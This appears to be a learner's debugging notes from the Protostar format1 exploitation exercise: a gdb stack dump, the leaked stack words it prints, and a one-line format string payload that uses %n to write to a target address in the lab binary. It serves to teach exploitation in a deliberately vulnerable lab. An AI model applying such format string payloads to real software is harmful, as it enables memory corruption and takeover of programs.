(gdb) x/20wx $esp+28
0xbffff704:     0x0804960c      0xbffff738      0x08048469      0xb7fd8304
0xbffff714:     0xb7fd7ff4      0xbffff738      0x08048435      0xbffff91f
0xbffff724:     0xb7ff1040      0x0804845b      0xb7fd7ff4      0x08048450
0xbffff734:     0x00000000      0xbffff7b8      0xb7eadc76      0x00000002
0xbffff744:     0xbffff7e4      0xbffff7f0      0xb7fe1848      0xbffff7a0
(gdb) c
Continuing.
0804960c|bffff738|08048469|b7fd8304|b7fd7ff4|bffff738|08048435|bffff91f|b7ff1040|0804845b|b7fd7ff4|08048450|00000000|bffff7b8|b7eadc76|00000002|bffff7e4|bffff7f0|b7fe1848|bffff7a0|
Program exited normally.
(gdb) 



/opt/protostar/bin/format1 `python -c 'print "\x38\x96\x04\x08AAA%134\$n"'`


